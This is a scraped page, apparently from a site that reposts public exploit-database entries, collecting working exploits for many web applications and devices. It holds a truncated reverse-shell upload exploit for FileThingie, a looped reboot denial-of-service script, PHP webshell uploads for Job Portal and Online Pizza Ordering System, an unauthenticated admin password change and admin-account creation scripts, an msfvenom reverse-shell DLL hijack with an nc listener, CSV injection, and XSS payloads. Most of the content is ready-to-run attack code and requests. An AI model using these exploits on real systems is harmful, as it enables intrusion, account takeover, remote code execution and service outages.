Exploit complete") return True def cleanup_local_files(self) -> bool: if os.path.exists(f"{self.payload_filename}.zip"): os.remove(f"{self.payload_filename}.zip") print("[+] Cleaned up zipped payload on local machine") return True print("[-] Could not clean up zipped payload on local machine") return False if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("-t", "--target", dest="target", type=str, required=True, help="Target URL to ft2.php") parser.add_argument("-u", "--username", dest="username", type=str, required=True, help="FileThingie username") parser.add_argument("-p", "--password", dest="password", type=str, required=True, help="FileThingie password") parser.add_argument("-L", "--LHOST", dest="lhost", type=str, required=True, help="Local listener ip") parser.add_argument("-P", "-LPORT", dest="lport", type=int, required=True, help="Local listener port") args = parser.parse_args() exploit = Exploit(args.target, args.username, args.password, args.lhost, args.lport) exploit.try_login() exploit.create_new_folder() exploit.create_payload() exploit.upload_payload() exploit.unzip_payload() exploit.execute_payload() exploit.cleanup_local_files()
HireHackking

Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

#Exploit Title: Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS) #Application: Ulicms #Version: 2023.1-sniffing-vicuna #Bugs: Stored Xss #Technology: PHP #Vendor URL: https://en.ulicms.de/ #Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip #Date of found: 04-05-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Go to media then to file (http://localhost/dist/admin/index.php?action=files) 2. upload malicious svg file svg file content ===> <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> poc request: POST /dist/admin/fm/upload.php HTTP/1.1 Host: localhost Content-Length: 663 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" Accept: application/json, text/javascript, */*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryK3CvcSs8xZwzABCl X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 sec-ch-ua-platform: "Linux" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/dist/admin/fm/dialog.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: last_position=%2F; 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv Connection: close ------WebKitFormBoundaryK3CvcSs8xZwzABCl Content-Disposition: form-data; name="fldr" ------WebKitFormBoundaryK3CvcSs8xZwzABCl Content-Disposition: form-data; name="files[]"; filename="SVG_XSS.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> ------WebKitFormBoundaryK3CvcSs8xZwzABCl-- 3. Go to http://localhost/dist/content/SVG_XSS.svg
HireHackking

FLEX 1080 < 1085 Web 1.6.0 - Denial of Service

HACKER · %s · %s

# Exploit Title: FLEX 1080 < 1085 Web 1.6.0 - Denial of Service # Date: 2023-05-06 # Exploit Author: Mr Empy # Vendor Homepage: https://www.tem.ind.br/ # Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94 # Version: 1.6.0 # Tested on: Android # CVE ID: CVE-2022-2591 #!/usr/bin/env python3 import requests import re import argparse from colorama import Fore import time def main(): def banner(): print(''' ________ _______ __ / ____/ / / ____/ |/ / / /_ / / / __/ | / / __/ / /___/ /___ / | /_/ /_____/_____//_/|_| [FLEX 1080 < 1085 Web 1.6.0 - Denial of Service] ''') def reboot(): r = requests.get(f'http://{arguments.target}/sistema/flash/reboot') if 'Rebooting' in r.text: pass else: print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware não é vulnerável') quit() banner() print(f'{Fore.LIGHTBLUE_EX}[*] {Fore.LIGHTWHITE_EX} Iniciando o ataque') while True: try: reboot() print(f'{Fore.LIGHTGREEN_EX}[+] {Fore.LIGHTWHITE_EX} Hardware derrubado com sucesso!') time.sleep(1) except: # print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware está inativo') pass if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-t','--target', action='store', help='Target', dest='target', required=True) arguments = parser.parse_args() try: main() except KeyError: quit()
HireHackking

Job Portal 1.0 - File Upload Restriction Bypass

HACKER · %s · %s

<!-- # Exploit Title: Job Portal 1.0 - File Upload Restriction Bypass # Date: 27-06-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://phpgurukul.com/job-portal-project/ # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7855 # Version: 1.0 # Tested on: Windows 7 64 Bits / Windows 10 64 Bits # CVE : # Category: webapps 1. Description File Upload Restriction Bypass vulnerabilities were found in Job Portal 1.0. This allows for an authenticated user to potentially obtain RCE via webshell. 2. Proof of Concept 1. Go the user profile >> (/jobportal/applicant/) 2.- Select profile image and load a valid image. 3. Turn Burp/ZAP Intercept On 4. Select webshell - ex: shell.png 5. Alter request in the upload... Update 'filename' to desired extension. ex: shell.php Not neccesary change content type to 'image/png' Example exploitation request: ==================================================================================================== POST http://127.0.0.1/jobportal/applicant/controller.php?action=photos HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: multipart/form-data; boundary=---------------------------57052814523281 Content-Length: 555 Origin: https://127.0.0.1 Connection: keep-alive Referer: https://127.0.0.1/jobportal/applicant/index.php?view=view&id= Cookie: PHPSESSID=qf9e02j0rda99cj91l36qcat34 Upgrade-Insecure-Requests: 1 Host: 127.0.0.1 -----------------------------57052814523281 Content-Disposition: form-data; name="MAX_FILE_SIZE" 1000000 -----------------------------57052814523281 Content-Disposition: form-data; name="photo"; filename="shell.php" Content-Type: image/png ?PNG ... <?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?> IEND -----------------------------57052814523281 Content-Disposition: form-data; name="savephoto" -----------------------------57052814523281-- ==================================================================================================== 6. Send the request and visit your new webshell Ex: https://127.0.0.1/jobportal/applicant/photos/shell.php?cmd=whoami nt authority\system 3. Solution: Patch: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload -->
HireHackking
# Exploit Title: Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx) # Exploit Author: LiquidWorm Vendor: DB Elettronica Telecomunicazioni SpA Product web page: https://www.screen.it | https://www.dbbroadcast.com https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ Affected version: Firmware: 1.9.3 Bios firmware: 7.1 (Apr 19 2021) Gui: 2.46 FPGA: 169.55 uc: 6.15 Summary: Screen's new radio DAB Transmitter is reaching the highest technology level in both Digital Signal Processing and RF domain. SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the digital adaptive precorrection and configuatio flexibility, the Hot Swap System technology, the compactness and the smart system design, the SFT DAB are advanced transmitters. They support standards DAB, DAB+ and T-DMB and are compatible with major headend brands. Desc: Screen is affected by an information disclosure vulnerability due to improper access control enforcement. An unauthenticated remote attacker can exploit this, via a specially crafted request to gain access to sensitive information including usernames and source IP addresses. Tested on: Keil-EWEB/2.1 MontaVista® Linux® Carrier Grade eXpress (CGX) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5776 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5776.php 19.03.2023 -- $ curl 'http://SFTDAB/system/api/userManager.cgx' {"ssbtType":"userManager","ssbtIdx":0,"ssbtObj":{"admin":false,"users":[{"user":"testingus","type":"GUEST","connected":false,"info":null},{"user":"joxy","type":"OPERATOR","connected":false,"info":null},{"user":"dude","type":"OPERATOR","connected":true,"info":{"ip":"192.168.178.150","tmo":120}}]}}
HireHackking
#!/usr/bin/env python3 # # Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Admin Password Change # Exploit Author: LiquidWorm # # # Vendor: DB Elettronica Telecomunicazioni SpA # Product web page: https://www.screen.it | https://www.dbbroadcast.com # https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ # Affected version: Firmware: 1.9.3 # Bios firmware: 7.1 (Apr 19 2021) # Gui: 2.46 # FPGA: 169.55 # uc: 6.15 # # Summary: Screen's new radio DAB Transmitter is reaching the highest # technology level in both Digital Signal Processing and RF domain. # SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the # digital adaptive precorrection and configuatio flexibility, the Hot # Swap System technology, the compactness and the smart system design, # the SFT DAB are advanced transmitters. They support standards DAB, # DAB+ and T-DMB and are compatible with major headend brands. # # Desc: This exploit circumvents the control and requirement of admin's # old password and directly changes the password. # # Tested on: Keil-EWEB/2.1 # MontaVista® Linux® Carrier Grade eXpress (CGX) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2023-5774 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5774.php # # # 19.03.2023 # import hashlib,datetime########## import requests,colorama######### from colorama import Fore, Style# colorama.init() print(Fore.RED+Style.BRIGHT+ ''' ██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ ██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ ██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ ''' +Style.RESET_ALL) print(Fore.WHITE+Style.BRIGHT+ ''' ZSL and the Producers insist that no one submit any exploits of themselfs or others performing any dangerous activities. We will not open or view them. ''' +Style.RESET_ALL) s=datetime.datetime.now() s=s.strftime('%d.%m.%Y %H:%M:%S') print('Starting API XPL -',s) t=input('Enter transmitter ip: ') p=input('Enter desired password: ') e='/system/api/userManager.cgx' m5=hashlib.md5() m5.update(p.encode('utf-8')) h=m5.hexdigest() print('Your sig:',h) print('Calling object: ssbtObj') print('CGX fastcall: userManager::changeUserPswd') t='http://'+t+e bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', 'Accept':'application/json, text/plain, */*', 'Accept-Language':'ku-MK,en;q=0.9', 'Accept-Encoding':'gzip, deflate', 'User-Agent':'Dabber-+', 'Connection':'close'} j={'ssbtIdx':0, 'ssbtType':'userManager', 'ssbtObj':{ 'changeUserPswd':{ 'username':'admin', 'password':h } }, } r=requests.post(t,headers=bh,json=j) if r.status_code==200: print('Done.') else: print('Error') exit(-2)
HireHackking

Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking

HACKER · %s · %s

*#Exploit Title:* Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking *#Date:* 14/05/2023 *#Exploit Author:* Ahsan Azad *#Vendor Homepage:* https://hubstaff.com/ *#Software Link:* https://app.hubstaff.com/download *#Version:* 1.6.13, 1.6.14 *#Tested On:* 64-bit operating system, x64-based processor *Description* Hubstaff is an employee work tracker with screenshots, timesheets, billing, in-depth reports, and more. During testing. It was found that the system32 subdirectory was missing a DLL library with the name *wow64log.dll* that had been required by the hubstaff's setup file during installation. Hence, using Metasploit's msfvenom to create a new wow64log.dll file, Tester was able to get a reverse shell locally. *Exploit* 1- Generate a dll file with the name wow64log.dll using the command: *msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f dll -o wow64log.dll* 2- Place the newly generated DLL to the *system32 *directory. 3- Start a listener on attacker's console using: *nc -lnvp <port_used_while_generating_DLL>* 4- Launch the exe. Reverse shell will be receive as: *C:\Windows>* *Attachments (For the understanding of verification team)* 1.png - Showing the wow64.dll was not found by the exe. [image: 1.png] 2.png - Showing how tester was able to generate a new dll using msfvenom on port 1337. [image: 2.png] 3.png - Showing a reverse connection received on the attacker's console at C:\Windows> by launching the exe.[image: 3.png]
HireHackking

Prestashop 8.0.4 - CSV injection

HACKER · %s · %s

Exploit Title: Prestashop 8.0.4 - CSV injection Application: prestashop Version: 8.0.4 Bugs: CSV Injection Technology: PHP Vendor URL: https://prestashop.com/ Software Link: https://prestashop.com/prestashop-edition-basic/ Date of found: 14.05.2023 Author: Mirabbas Ağalarov Tested on: Windows 2. Technical Details & POC ======================================== Step 1. login as user step 2. Go to My Account then information ( http://localhost/index.php?controller=identity ) step 3. Set Email as =calc|a!z|@test.com step 3. If admin Export costumers as CSV file ,in The computer of admin occurs csv injection and will open calculator (http://localhost/admin07637b2omxxdbmhikgb/index.php/sell/customers/?_token=mtc1BTvq-Oab2lBdfCaxpOorYraGGVMiTFluJzOpkWI) payload: =calc|a!z|@test.com
HireHackking
# Exploit Title: Jedox 2022.4.2 - Disclosure of Database Credentials via Connection Checks # Date: 28/04/2023 # Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL # Vendor Homepage: https://jedox.com # Version: Jedox 2022.4 (22.4.2) and older # CVE : CVE-2022-47880 Introduction ================= An information disclosure vulnerability in `/be/rpc.php` allows remote authenticated users with the appropriate permissions to modify database connections to disclose the clear text credentials via the `test connection` function. To exploit the vulnerability, the attacker must set the host of the database connection to a server under his control. Write-Up ================= See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability. Proof of Concept ================= 1) The host part of a database connection can be changed in the connections details in the UI. Set the Host to a server that you control. 2) Test the database connection. 3) The webserver initiates a connection to the server that you control. Use wireshark to capture network traffic and to ultimately extract the database credentials.
HireHackking

Online Pizza Ordering System v1.0 - Unauthenticated File Upload

HACKER · %s · %s

# Exploit Title: Online Pizza Ordering System 1.0 - Unauthenticated File Upload # Date: 03/05/2023 # Exploit Author: URGAN # Vendor Homepage: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-opos.zip # Version: v1.0 # Tested on: LAMP Fedora Server 27 (Twenty Seven) Apache/2.4.34 (Fedora) 10.2.19-MariaDB PHP 7.1.23 # CVE: CVE-2023-2246 #!/usr/bin/env python3 # coding: utf-8 import os import requests import argparse from bs4 import BeautifulSoup # command line arguments parser = argparse.ArgumentParser() parser.add_argument('-u', '--url', type=str, help='URL with http://') parser.add_argument('-p', '--payload', type=str, help='PHP webshell') args = parser.parse_args() # if no arguments are passed, ask the user for them if not (args.url and args.payload): args.url = input('Enter URL with http://: ') args.payload = input('Enter file path PHP webshell: ') # URL Variables url = args.url + '/admin/ajax.php?action=save_settings' img_url = args.url + '/assets/img/' filename = os.path.basename(args.payload) files = [ ('img',(filename,open(args.payload,'rb'),'application/octet-stream')) ] # send a POST request to the server resp_upl = requests.post(url, files = files) status_code = resp_upl.status_code if status_code == 200: print('[+] File uploaded') else: print(f'[-] Error {status_code}: {resp_upl.text}') raise SystemExit(f'[-] Script stopped due to error {status_code}.') # send a GET request to the server resp_find = requests.get(img_url) # Use BeautifulSoup to parse the page's HTML code soup = BeautifulSoup(resp_find.text, 'html.parser') # get all <a> tags on a page links = soup.find_all('a') # list to store found files found_files = [] # we go through all the links and look for the desired file by its name for link in links: file_upl = link.get('href') if file_upl.endswith(filename): # uploaded file name print('[+] Uploaded file found:', file_upl) file_url = img_url + file_upl # get the full URL of your file found_files.append(file_url) # add the file to the list of found files # if the list is not empty, then display all found files if found_files: print('[+] Full URL of your file:') for file_url in found_files: print('[+] ' + file_url) else: print('[-] File not found')
HireHackking

Ulicms-2023.1-sniffing-vicuna - Privilege escalation

HACKER · %s · %s

#Exploit Title: Ulicms 2023.1 sniffing-vicuna - Privilege escalation #Application: Ulicms #Version: 2023.1-sniffing-vicuna #Bugs: Privilege escalation #Technology: PHP #Vendor URL: https://en.ulicms.de/ #Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip #Date of found: 04-05-2023 #Author: Mirabbas Ağalarov #Tested on: Linux ##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicuna import requests new_name=input("name: ") new_email=input("email: ") new_pass=input("password: ") url = "http://localhost/dist/admin/index.php" headers = {"Content-Type": "application/x-www-form-urlencoded"} data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language=" response = requests.post(url, headers=headers, data=data) if response.status_code == 200: print("Request is success and created new admin account") else: print("Request is failure.!!")
HireHackking

RockMongo 1.1.7 - Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: RockMongo 1.1.7 - Stored Cross-Site Scripting (XSS) # Discovery by: Rafael Pedrero # Discovery Date: 2020-09-19 # Vendor Homepage: https://github.com/iwind/rockmongo/ # Software Link : https://github.com/iwind/rockmongo/ # Tested Version: 1.1.7 # Tested on: Windows 7 and 10 # Vulnerability Type: Stored Cross-Site Scripting (XSS) CVSS v3: 6.5 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-79 Vulnerability description: RockMongo v1.1.7, does not sufficiently encode user-controlled inputs, resulting in a stored and reflected Cross-Site Scripting (XSS) vulnerability via the index.php, in multiple parameter. Proof of concept: Stored: POST https://localhost/mongo/index.php?action=db.newCollection&db=local HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 69 Origin: https://localhost Connection: keep-alive Referer: https://localhost/mongo/index.php?action=db.newCollection&db=local Cookie: PHPSESSID=jtjuid60sv6j3encp3cqqps3f7; ROCK_LANG=es_es; rock_format=json Upgrade-Insecure-Requests: 1 Host: localhost name=%09%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&size=0&max=0 Reflected: https://localhost/mongo/index.php?action=collection.index&db=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&collection=startup_log https://localhost/mongo/index.php?action=collection.index&db=local&collection=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E https://localhost/mongo/index.php?action=db.index&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E http://localhost/mongo/index.php?db=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&collection=startup_log&action=collection.index&format=json&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll http://localhost/mongo/index.php?db=local&collection=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&action=collection.index&format=json&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll http://localhost/mongo/index.php?db=local&collection=startup_log&action=collection.index&format=%27+onMouseOver%3D%27alert%281%29%3B&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll POST http://localhost/mongo/index.php?action=login.index&host=0 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 109 Origin: https://localhost Authorization: Basic cm9vdDpyb290 Connection: keep-alive Referer: https://localhost/mongo/index.php?action=login.index&host=0 Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1; rock_format=json Upgrade-Insecure-Requests: 1 Host: localhost more=0&host=0&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=****&db=&lang=es_es&expire=3 POST http://localhost/mongo/index.php?action=server.command& HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 109 Origin: https://localhost Authorization: Basic cm9vdDpyb290 Connection: keep-alive Referer: https://localhost/mongo/index.php?action=server.command& Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1; rock_format=json Upgrade-Insecure-Requests: 1 Host: localhost command=%7B%0D%0A++listCommands%3A+1%0D%0A%7D&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&format=json POST http://localhost/mongo/index.php?action=server.execute& HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 140 Origin: https://localhost Authorization: Basic cm9vdDpyb290 Connection: keep-alive Referer: https://localhost/mongo/index.php?action=server.execute& Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1; rock_format=json Upgrade-Insecure-Requests: 1 Host: localhost code=function+%28%29+%7B%0D%0A+++var+plus+%3D+1+%2B+2%3B%0D%0A+++return+plus%3B%0D%0A%7D&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
HireHackking
# Exploit Title: Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS) # Date: 27-06-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://bigprof.com # Software Download Link : https://bigprof.com/appgini/applications/online-clinic-management-system # Version : 2.2 # Category: Webapps # Tested on: Windows 7 64 Bits / Windows 10 64 Bits # CVE : # Category: webapps # Vulnerability Type: Stored Cross-Site Scripting 1. Description Online Clinic Management System 2.2, does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via the /clinic/medical_records_view.php, in FirstRecord parameter, GET and POST request. 2. Proof of Concept GET: http://127.0.0.1/clinic/medical_records_view.php?SelectedID=2&record-added-ok=5781&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString= POST: POST http://127.0.0.1/clinic/medical_records_view.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: multipart/form-data; boundary=---------------------------1512016725878 Content-Length: 1172 Origin: https://127.0.0.1 Connection: keep-alive Referer: https://127.0.0.1/clinic/medical_records_view.php Cookie: online_clinic_management_system=bnl1ht0a4n7snalaoqgh8f85b4; online_clinic_management_system.dvp_expand=[%22tab_medical_records-patient%22%2C%22tab_events-name_patient%22] Upgrade-Insecure-Requests: 1 Host: 127.0.0.1 -----------------------------1512016725878 Content-Disposition: form-data; name="current_view" DVP -----------------------------1512016725878 Content-Disposition: form-data; name="SortField" -----------------------------1512016725878 Content-Disposition: form-data; name="SelectedID" 1 -----------------------------1512016725878 Content-Disposition: form-data; name="SelectedField" -----------------------------1512016725878 Content-Disposition: form-data; name="SortDirection" -----------------------------1512016725878 Content-Disposition: form-data; name="FirstRecord" "><script>alert(1);</script> -----------------------------1512016725878 Content-Disposition: form-data; name="NoDV" -----------------------------1512016725878 Content-Disposition: form-data; name="PrintDV" -----------------------------1512016725878 Content-Disposition: form-data; name="DisplayRecords" all -----------------------------1512016725878 Content-Disposition: form-data; name="patient" -----------------------------1512016725878 Content-Disposition: form-data; name="SearchString" -----------------------------1512016725878-- 1. Description Online Clinic Management System 2.2, does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via the /clinic/patients_view.php, in FirstRecord parameter. 2. Proof of Concept http://127.0.0.1/clinic/patients_view.php?SelectedID=1&record-added-ok=11536&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString= And Reflected Cross-Site Scripting (XSS) too. # Vulnerability Type: Reflected Cross-Site Scripting 1. Description Online Clinic Management System 2.2, does not sufficiently encode user-controlled inputs, resulting in a Reflected Cross-Site Scripting (XSS) vulnerability via the /clinic/events_view.php, in FirstRecord parameter. 2. Proof of Concept http://127.0.0.1/clinic/events_view.php?SelectedID=2&record-added-ok=7758&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString= 1. Description Online Clinic Management System 2.2, does not sufficiently encode user-controlled inputs, resulting in a Reflected Cross-Site Scripting (XSS) vulnerability via the /clinic/disease_symptoms_view.php, in FirstRecord parameter. 2. Proof of Concept http://127.0.0.1/clinic/disease_symptoms_view.php?SelectedID=1&record-added-ok=1096&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=
HireHackking

Epson Stylus SX510W Printer Remote Power Off - Denial of Service

HACKER · %s · %s

# Exploit Title: Epson Stylus SX510W Printer Remote Power Off - Denial of Service (PoC) # Discovery by: Rafael Pedrero # Discovery Date: 2020-05-16 # Vendor Homepage: https://www.epson.es/ # Software Link : https://www.epson.es/products/printers/inkjet-printers/for-home/epson-stylus-sx510w # Tested Version: EPSON_Linux UPnP/1.0 Epson UPnP SDK/1.0 # Tested on: Linux/Windows # Vulnerability Type: Denial of Service (DoS) 1. Description The vulnerability occurs when 2 or more &'s are sent to the server in a row ("/PRESENTATION/HTML/TOP/INDEX.HTML") causing it to shutdown. 2. Proof of Concept Request: curl -s "http:// <printer_ip_address>/PRESENTATION/HTML/TOP/INDEX.HTML?RELOAD=&&tm=1589865865549" 3. Solution: This version product is deprecated. -->
HireHackking

TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

#Exploit Title: TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS) #Application: TinyWebGallery #Version: v2.5 #Bugs: Stored Xss #Technology: PHP #Vendor URL: http://www.tinywebgallery.com/ #Software Link: https://www.tinywebgallery.com/download.php?tinywebgallery=latest #Date of found: 07-05-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Login to account 2. Go to http://localhost/twg25/index.php?twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg 3. Edit 4. Set folder name section as <script>alert(4)</script> Request : POST /twg25/i_frames/i_titel.php HTTP/1.1 Host: localhost Content-Length: 264 Cache-Control: max-age=0 sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: iframe Referer: http://localhost/twg25/i_frames/i_titel.php?twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=qc7mfbthpf7tnf32a34p8l766k Connection: close 